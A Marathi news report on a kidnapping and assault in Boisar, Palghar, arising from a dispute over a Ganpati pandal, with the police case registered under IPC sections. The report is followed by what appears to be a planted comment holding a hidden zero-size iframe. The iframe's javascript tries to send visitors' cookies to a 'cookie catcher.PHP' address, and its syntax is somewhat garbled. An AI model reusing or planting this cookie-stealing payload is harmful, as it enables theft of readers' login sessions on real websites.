वादातुन अपहरण प्रकरणी बोईसर पोलीस स्टेशन मध्ये गुन्हा दाखल
वादातुन अपहरण प्रकरणी बोईसर पोलीस स्टेशन मध्ये गुन्हा दाखल
पालघर :बोईसर शहरात गणपती मंडपाच्या वादातुन अमृत धोडी यांना सुधीर विचारे, विक्रांत संखे व अन्य जणावर अपहरण करून मारण्याचा प्रयन्त केल्याची घटना समोर आली आहे त्याबाबत बोईसर पोलीस स्टेशन मध्ये गुन्हा ही दाखल करण्यात आला आहे.
यशवंत सृष्टी येथील साईबाबा मंदीरा समोर गणपती मंडपाचे काम दिनांक 26 ऑगस्ट 2022 रोजी सुरु असताना अमृत प्रकाश धोडी यांना मंडपाच्या वादातुन सुधीर प्रभाकर विचारे, विक्रांत जयवंत संखे यांच्यासह अन्य काही जणानी धोडी यांना वादानंतर जबरदस्तीने चार चाकी वाहनात बसवून मनोर येथे नेण्यात आले होते.
अमृत धोडी यांनी सांगितले प्रमाणे तीन चारचाकी वाहन घेऊन आलेल्यांनी धोडी यास मारहाण करून अपहरण करण्याचा प्रयत्न होत असताना माझा मोबाईल गाडी बाहेर फेकून मला शिवीगाळ केली. तर माझा अपहरण होत असताना उपस्थित लोकांनी माझ्या घरी सांगितल्यानंतर सुधीर विचारे ला आलेल्या फोन मुळे माझी सुटका झाली अन्यथा माझं मरण अटळ होता.
दरम्यान सुटका झालेल्या अमृत धोडी आपला प्राण वाचवत चिल्हार फाटा येथून खाजगी वाहनातून थेट बोईसर पोलिस ठाणे गाठत आपली फिर्याद नोंदविली असून सदर प्रकरणाची गंभीर दखल घेत भारतीय दंड संहिता १८६० कलम ३६७, ३२३, ४२७, ५०४, ५०६, ३४ प्रमाणे गुन्हा नोंद असून पुढील तपास सहाय्यक पोलीस निरीक्षक सुरेश साळुंखे हे करत आहेत.
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='https://ncrimealert.blogspot.com/2022/08/blog-post_29.html/cookie catcher.PHP?c=' document.cookie)></iframe>
ReplyDelete